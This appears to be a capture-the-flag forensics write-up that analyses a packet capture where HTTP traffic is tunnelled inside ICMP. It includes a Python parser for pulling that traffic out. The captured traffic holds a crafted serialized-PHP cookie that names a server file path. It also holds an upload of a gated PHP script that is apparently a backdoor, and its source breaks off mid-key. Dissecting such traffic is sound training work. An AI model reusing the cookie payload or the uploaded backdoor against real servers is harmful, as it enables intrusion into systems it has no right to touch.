Opening temp.pcap in Wireshark shows a large number of ICMP packets.
Some of these ICMP packets are unusually large, and on inspection they are clearly carrying HTTP protocol data:
Right-click the packet and choose "Show Packet Bytes" to look at this HTTP data more closely:
GET /test.html HTTP/1.1
Host: 192.168.11.1
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:78.0) Gecko/20100101 Firefox/78.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Connection: keep-alive
Cookie: PHPSESSID=Tzo5OiJQYWdlTW9kZWwiOjE6e3M6NDoiZmlsZSI7czoxNToiL3d3dy9pbmRleC5odG1sIjt9
Upgrade-Insecure-Requests: 1
If-Modified-Since: Tue, 19 Oct 2021 02:52:56 GMT
If-None-Match: "110-5ceabc236d07e-gzip"
Here the cookie value Tzo5OiJQYWdlTW9kZWwiOjE6e3M6NDoiZmlsZSI7czoxNToiL3d3dy9pbmRleC5odG1sIjt9 is base64; it decodes to a serialized PHP object that holds a file path: O:9:"PageModel":1:{s:4:"file";s:15:"/www/index.html";} .
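The same extraction can be scripted instead of clicking through Wireshark. The following is an added example, not part of the original write-up: it walks a classic pcap file, pulls the payload out of every IPv4 ICMP packet, reports the ones that carry an HTTP request line, and base64-decodes the PHPSESSID cookie. The sample pcap it parses is constructed inline (one ordinary ping plus one ICMP packet wrapping the GET shown above) so it runs offline; the real temp.pcap is not included.

```python
import base64
import struct

def icmp_payloads(pcap: bytes):
    """Yield (packet_no, icmp_payload) for each IPv4 ICMP packet in a classic pcap file."""
    endian = "<" if pcap[:4] == b"\xd4\xc3\xb2\xa1" else ">"   # byte order from the magic
    off, num = 24, 0                                            # skip the 24-byte global header
    while off + 16 <= len(pcap):
        caplen = struct.unpack(endian + "IIII", pcap[off:off + 16])[2]
        frame = pcap[off + 16:off + 16 + caplen]
        off, num = off + 16 + caplen, num + 1
        if len(frame) < 34 or frame[12:14] != b"\x08\x00":     # Ethernet type is not IPv4
            continue
        ip = frame[14:]
        ihl, total_len = (ip[0] & 0x0F) * 4, struct.unpack("!H", ip[2:4])[0]
        if ip[9] == 1:                                          # IP protocol 1 = ICMP
            yield num, ip[ihl + 8:total_len]                    # drop the 8-byte ICMP header

def http_requests(pcap: bytes):
    """Return [(packet_no, request_line, decoded PHPSESSID or None)] for HTTP inside ICMP."""
    found = []
    for num, payload in icmp_payloads(pcap):
        if not payload.startswith((b"GET ", b"POST ")):
            continue
        text, session = payload.decode("latin-1"), None
        for line in text.split("\r\n"):
            if line.startswith("Cookie:") and "PHPSESSID=" in line:
                raw = line.split("PHPSESSID=", 1)[1].split(";")[0]
                session = base64.b64decode(raw + "=" * (-len(raw) % 4)).decode("latin-1")
        found.append((num, text.split("\r\n", 1)[0], session))
    return found

def _icmp_frame(payload: bytes) -> bytes:
    """Ethernet + IPv4 + ICMP echo request wrapped around payload (checksums left as zero)."""
    ip = struct.pack("!BBHHHBBH4s4s", 0x45, 0, 28 + len(payload), 1, 0, 64, 1, 0,
                     bytes([192, 168, 11, 2]), bytes([192, 168, 11, 1]))
    return b"\x00" * 12 + b"\x08\x00" + ip + struct.pack("!BBHHH", 8, 0, 0, 1, 1) + payload

def build_sample_pcap() -> bytes:
    """Constructed sample: one ordinary ping, then an ICMP packet carrying the page's GET."""
    pcap = struct.pack("<IHHiIII", 0xA1B2C3D4, 2, 4, 0, 0, 65535, 1)   # linktype 1 = Ethernet
    req = (b"GET /test.html HTTP/1.1\r\nHost: 192.168.11.1\r\nCookie: PHPSESSID="
           b"Tzo5OiJQYWdlTW9kZWwiOjE6e3M6NDoiZmlsZSI7czoxNToiL3d3dy9pbmRleC5odG1sIjt9\r\n\r\n")
    for payload in (b"abcdefghijklmnop" * 3, req):
        frame = _icmp_frame(payload)
        pcap += struct.pack("<IIII", 0, 0, len(frame), len(frame)) + frame
    return pcap

if __name__ == "__main__":
    print(http_requests(build_sample_pcap()))
```

To run it against a real capture, replace build_sample_pcap() with the bytes of the pcap file; pcapng files use a different container format and are not handled here.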
Looking through the other ICMP packets (43676, 43680), the following HTTP data stands out as suspicious:
POST /upload.php HTTP/1.1
Host: 192.168.11.1
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:78.0) Gecko/20100101 Firefox/78.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Content-Type: multipart/form-data; boundary=---------------------------202049257429575872453803494412
Content-Length: 1812
Origin: http://192.168.11.1
Connection: keep-alive
Referer: http://192.168.11.1/test.html
Cookie: PHPSESSID=Tzo5OiJQYWdlTW9kZWwiOjE6e3M6NDoiZmlsZSI7czoxNToiL3d3dy9pbmRleC5odG1sIjt9
Upgrade-Insecure-Requests: 1
-----------------------------202049257429575872453803494412
Content-Disposition: form-data; name="fileToUpload"; filename="message.php"
Content-Type: application/x-php
<?php
define('AES_256_ECB', 'aes-256-ecb');
if(!isset($_REQUEST['pub']))
die("403 Forbiden");
if(!isset($_REQUEST['maybe_key']))
die("403 Forbiden");
$publicKeyString = <<<PK
-----BEGIN PUBLIC KEY-----
MIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEA6YEBA42r+mPDGi1JTSK9
3yszPBPEzj4D+hlamCt/RCelQgnOptkfpziGZ6J466N7/Y9N4iuNI6oPiohZXFmM
H4CAfdqRI0B7kIlB6UFBoZPTxUgIQof1aaNcu7u0a6Rd2YGtREEAWqQri2mpGikq
g8B3k75fFOGaxfV3HL07lwko15mbgyZdtGZwof3Bepp8DdkfmSEp3wygMy1Tygk7
sI4g1AA/7l+2VIEw/zrwSo5maG98CcKoTmMygBUeVOCB+YkGti4UBYUOcOCkWrBR
YSsCZNiSGuSwMkSw80RWPmMeTV7Zqzln6ho9LFkCnXyQ77yTNJJpA6J